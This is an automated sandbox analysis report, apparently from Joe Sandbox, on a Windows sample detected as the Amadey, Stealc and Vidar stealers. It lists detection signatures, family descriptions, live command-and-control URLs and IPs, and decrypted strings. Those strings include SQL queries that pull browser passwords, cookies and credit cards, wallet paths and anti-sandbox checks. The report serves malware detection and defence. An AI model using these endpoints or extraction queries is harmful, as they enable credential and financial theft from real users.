Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1483400
MD5: c8b29f4c8c60a861b941dc46c03d41bc
SHA1: 43e5e1266128f01d074d3aba20465ab19d26050b
SHA256: afddc92c285934cfa180d497fd271e5eae08117765a5797b3ecbd5bdeafe49d0
Tags: exe, Stealc

Detection

Amadey, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Amadeys stealer DLL
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first to grab information on 2FA software and the Tor Browser.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: file.exe Avira: detected
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.19/15.113.19/ Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/5499d72b3a3e55be.phpvWn Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpncoded Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/nss3.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.19/ferences.SourceAumid1 Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/AppData Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dllRZT Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR= Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.php2? Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpwb Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/ons Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/5499d72b3a3e55be.phposition: Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpv? Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/5499d72b3a3e55be.php; Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.php# Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpn? Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\userAKKKFBGDHJ.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Avira: detection malicious, Label: HEUR/AGEN.1312596
Source: 0.2.file.exe.40b0e67.1.raw.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.31silence"}
Source: 624f4d727e.exe.6648.24.memstrmin Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.31/5499d72b3a3e55be.php"}
Source: explorti.exe.7696.19.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}
Source: http://185.215.113.19/15.113.19/ Virustotal: Detection: 15%
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll Virustotal: Detection: 17%
Source: http://185.215.113.16/Jo89Ku7d/index.phpncoded Virustotal: Detection: 8%
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll/ Virustotal: Detection: 24%
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll Virustotal: Detection: 17%
Source: http://85.28.47.31/8405906461a5200c/nss3.dll Virustotal: Detection: 9%
Source: http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR= Virustotal: Detection: 13%
Source: file.exe Virustotal: Detection: 40%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Joe Sandbox ML: detected
Source: C:\Users\userAKKKFBGDHJ.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: 22
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: 08
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: 20
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: 24
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetProcAddress
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: LoadLibraryA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: lstrcatA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: OpenEventA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateEventA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CloseHandle
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Sleep
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: VirtualFree
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetSystemInfo
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: VirtualAlloc
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HeapAlloc
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetComputerNameA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: lstrcpyA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetProcessHeap
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetCurrentProcess
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: lstrlenA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ExitProcess
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetSystemTime
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: advapi32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: gdi32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: user32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: crypt32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ntdll.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetUserNameA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateDCA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetDeviceCaps
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ReleaseDC
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sscanf
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: VMwareVMware
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HAL9TH
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: JohnDoe
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: DISPLAY
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: http://85.28.47.31
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: silence
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: /5499d72b3a3e55be.php
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: /8405906461a5200c/
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sila
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetFileAttributesA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GlobalLock
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HeapFree
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetFileSize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GlobalSize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: IsWow64Process
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Process32Next
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetLocalTime
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: FreeLibrary
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Process32First
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: DeleteFileA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: FindNextFileA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: LocalFree
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: FindClose
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: LocalAlloc
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetFileSizeEx
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ReadFile
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SetFilePointer
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: WriteFile
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateFileA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: FindFirstFileA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CopyFileA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: VirtualProtect
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetLastError
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: lstrcpynA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GlobalFree
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GlobalAlloc
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: OpenProcess
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: TerminateProcess
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: gdiplus.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ole32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: bcrypt.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: wininet.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: shlwapi.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: shell32.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: psapi.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SelectObject
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BitBlt
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: DeleteObject
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdiplusStartup
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdiplusShutdown
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipDisposeImage
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GdipFree
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CoUninitialize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CoInitialize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CoCreateInstance
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptDecrypt
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptSetProperty
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetWindowRect
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetDesktopWindow
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetDC
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CloseWindow
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: wsprintfA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CharToOemW
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: wsprintfW
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RegQueryValueExA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RegCloseKey
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RegEnumValueA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CryptUnprotectData
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ShellExecuteExA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetConnectA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetCloseHandle
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetOpenA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HttpSendRequestA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetReadFile
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: StrCmpCA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: StrStrA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: StrCmpCW
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: PathMatchSpecA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RmStartSession
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RmRegisterResources
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RmGetList
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: RmEndSession
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sqlite3_open
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sqlite3_step
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sqlite3_column_text
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sqlite3_finalize
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sqlite3_close
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: encrypted_key
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: PATH
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: NSS_Init
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: NSS_Shutdown
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: PK11_Authenticate
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: C:\ProgramData\
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: browser:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: profile:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: url:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: login:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: password:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Opera
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: OperaGX
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Network
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: cookies
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: .txt
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: TRUE
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: FALSE
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: autofill
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SELECT name, value FROM autofill
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: history
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: cc
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: name:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: month:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: year:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: card:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Cookies
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Login Data
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Web Data
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: History
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: logins.json
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: formSubmitURL
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: usernameField
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: encryptedUsername
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: encryptedPassword
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: guid
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: cookies.sqlite
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: formhistory.sqlite
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: places.sqlite
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: plugins
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Local Extension Settings
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Sync Extension Settings
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: IndexedDB
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Opera Stable
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Opera GX Stable
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: CURRENT
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: chrome-extension_
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Local State
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: profiles.ini
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: chrome
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: opera
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: firefox
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: wallets
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ProductName
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: x32
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: x64
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: ProcessorNameString
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: DisplayName
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: DisplayVersion
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: Network Info:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - IP: IP?
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - Country: ISO?
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: System Summary:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - HWID:
Source: 0.2.file.exe.40b0e67.1.raw.unpack String decryptor: - OS:
